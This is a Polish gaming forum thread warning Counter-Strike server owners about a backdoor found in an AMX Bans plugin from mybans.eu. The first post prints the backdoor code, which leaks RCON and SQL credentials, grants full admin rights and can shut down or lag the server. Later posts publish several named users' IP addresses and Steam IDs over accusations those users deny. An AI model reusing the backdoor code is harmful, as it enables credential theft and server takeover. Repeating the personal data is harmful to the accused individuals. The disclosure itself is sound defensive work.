(!) Mybans.eu - Włamania na serwery
DaFFyy
21.01.2021
Cześć,
Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.
Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.
public amxbanuser1(id) { get_cvar_string("rcon_password", szRc, 63); client_print(id, print_console, "RCON:\"%s\"", szRc); } public amxbanuser2(id) { set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0); get_cvar_string("amx_sql_host", szSqlHost, 63); get_cvar_string("amx_sql_user", szSqlUser, 63); get_cvar_string("amx_sql_pass", szSqlPass, 63); get_cvar_string("amx_sql_db", szSqlDb, 63); client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost); client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser); client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass); client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb); } public amxbanuser3() { server_cmd("rcon_password 748663183"); } public amxbanuser4() { server_cmd("shutdownserver"); } public amxbanuser5() { set_task(0.00, "lagsnc", 2137, "", 0, "b", 0); } public lagsnc() { remove_task(2138, 0); server_cmd("sys_ticrate 1"); } public amxbanuser6() { set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0); } public lagsncoff() { remove_task(2137, 0); server_cmd("sys_ticrate 1000"); }
- Atakujący może poznać hasło rcon / zmienić je
- Atakujący może poznać dane sql amxbansa
- Atakujący może wyłączyć serwer
- Atakujący może zlagować serwer
- Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet
Posprawdzajcie swoje serwery,
( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.
Nie musicie dziękować, żyjcie w miłości i spokoju!
Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/
@edit
Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:
Jonkey - https://mybans.pl/profile/1-jonkey/
smajli - x
Kava - x
Użytkownik dasiek edytował ten post 22.01.2021 07:39
nojaknie
21.01.2021
Tutaj LIVE z całego zajścia (Dzięki Joker za podesłanie)
https://www.youtube....jt5SFV0&t=1420s
Proponuje zbanować tych państwa u siebie w drodze wykorzystania tej informacji wszyscy zgodnie..
DaFFyy
21.01.2021
https://steamcommuni...d/1337elitegod/-> profil steam który został wykorzystany
steamID STEAM_0:1:253252
IP 109.231.63.218
Użytkownik DaFFyy edytował ten post 21.01.2021 19:37
`Joker.^^
21.01.2021
Macie dodajcie do swoich banned.cfg
http://banid.pl/spra...id=0:0:83244330
http://banid.pl/spra...sid=0:0:1880251
http://banid.pl/spra...d=0:1:522900732
http://banid.pl/spra...d=0:1:179267878
http://banid.pl/spra...sid=0:0:2220945
http://banid.pl/spra...d=0:1:218775405
http://banid.pl/spra...id=0:1:39052273
http://banid.pl/spra...id=0:1:34435527
http://banid.pl/spra...d=0:0:166483337
http://banid.pl/spra...d=0:0:522971727
http://banid.pl/spra...d=0:1:447448390
http://banid.pl/spra...id=0:1:34224576
http://banid.pl/spra...d=0:1:120758329
http://banid.pl/spra...d=0:1:219929821
http://banid.pl/spra...d=0:1:243871415
http://banid.pl/spra...id=0:1:19374731
http://banid.pl/spra...id=0:0:17420249
http://banid.pl/spra...d=0:0:144454872
http://banid.pl/spra...id=0:1:38629929
Osoby które podałem to konta oraz mult konta. Oraz znajomi do pomocy to jest 1/4 mojej listy. A pana smajleja dobrze znam jak atakował w inne sposoby moje serwery na czitach. To to na filmiku co podałem Esejowi to jeszcze nic,
Engi
21.01.2021
Omg to banid jeszcze żyje?
@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić
DaFFyy
21.01.2021
Omg to banid jeszcze żyje?
@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić
Smajli
IP - 95.223.72.181
STEAM - STEAM_0:0:419329152
nKava
21.01.2021
straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze
Użytkownik nKava edytował ten post 21.01.2021 20:49
GrZ3SiU
21.01.2021
straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze
Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu
@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy
Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery
Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny.
nKava
21.01.2021
straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze
Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu
@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy
Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery
Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny.
forum amxx.pl nie jest od rozwiązywania tego typu sporów.
z resztą ja nic nie zrobiłem i tylko się przyglądam pozdro
Engi
21.01.2021
A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy
Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).
Swoją drogą ktoś już zdjął domenę MyBans.pl także karma szybko wróciła.
DaFFyy
21.01.2021
A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy
Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).
Z tego co się dowiedziałem od właściciela sieci to on to kompilował, więc możliwe, że też .inc były podmienione kiedyś lub dalej są, ale 100% pewności nie mam bo też mogło mu się coś zapomnieć czy wrzucił gotowca czy nie ;d
W bansie masz hasła w md5 które możesz w miare łatwo wyszukać lub złamać
Użytkownik DaFFyy edytował ten post 21.01.2021 22:08
Jonkey
22.01.2021
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu
DaFFyy
22.01.2021
Po pierwsze na moim forum nie ma żadnych pluginów .amxx
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu
Ktoś o takim nicku był na serwerze, wiec 2 opcje:
1. byłeś to Ty
2. przypadek albo celowe wprowadzenie w błąd żeby myśleć, że to Ty
ale jeżeli chodzi o temat to tak, z pośpiechu napisałem .pl ale chodzi o mybans.eu, nie mogłem już edytować więc trzeba czekać na modów
Użytkownik DaFFyy edytował ten post 22.01.2021 01:58
Jonkey
22.01.2021
I jak wchodzę na jakikolwiek serwer to wchodzę przez swojego steam. Tyle w temacie z mojej strony jak i osoby. Nie bawią mnie żadne ataki na inne sieci.
nastyBle
22.01.2021
Witam
Chciałbym się ustosunkować do zaistniałej sytuacji
Jestem właścicielem projektu mybans.eu
1.Rzekoma osoba wykorzystująca lukę
Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:
Jonkey - https://mybans.pl/profile/1-jonkey/
Jonek nie ma z tym nic wspólnego, dotknęło go to tak samo jak mnie ponieważ zostały zaatakowane dwa osobne vps-y jego i mój
Bardzo proszę o usunięcie adresu do profilu w pierwszym poście bo to jest krzywdzące
2.Pluginy
Użytkowanik ma do wyboru dwa sam wybiera co wrzuci na serwer, pliki nigdy nie były edytowane przez moją załogę lub osoby trzecie przed zamieszczeniem na serwerze
3. Projekt jest już od dawna na wymarciu, jest mi jedynie szkoda iż udostępniając za free AMX bansa z baza i hostingiem spotkałem się z taką falą hejtu
Nie czerpiąc zysków z projektu i udostępniając go całkowicie za darmo
Podziękowania dla autora postu za zgłoszenie
Rejestracja na stronie zamknięta, czas się pakować
pozdrawiam
DarkGL
22.01.2021
A czy po prostu nie mieliście włamania i podmiany pluginów ? Nawet u nas zdarzyła się podmiana kompilatora.
nastyBle
22.01.2021
Daty modyfikacji plików wykluczają taką opcję ....
na serv mam dwa pluginy do pobrania jede zawiera zapewne błędy ... data upload to 2011 i 2013
smajlid
22.01.2021
Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer.
Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.
nastyBle
22.01.2021
Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer.
Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.
Korzystanie z kradzionych danych też jest karane
Generalnie dla mnie temat jest zamknięty strona OFF i po problemie i tak nic z niej nigdy nie zarobiłem a były z sentymentu i dla chęciu udostępnienia tym co nie umieją zainstalować lub ich na to nie stac
Użytkownik nastyBle edytował ten post 22.01.2021 09:44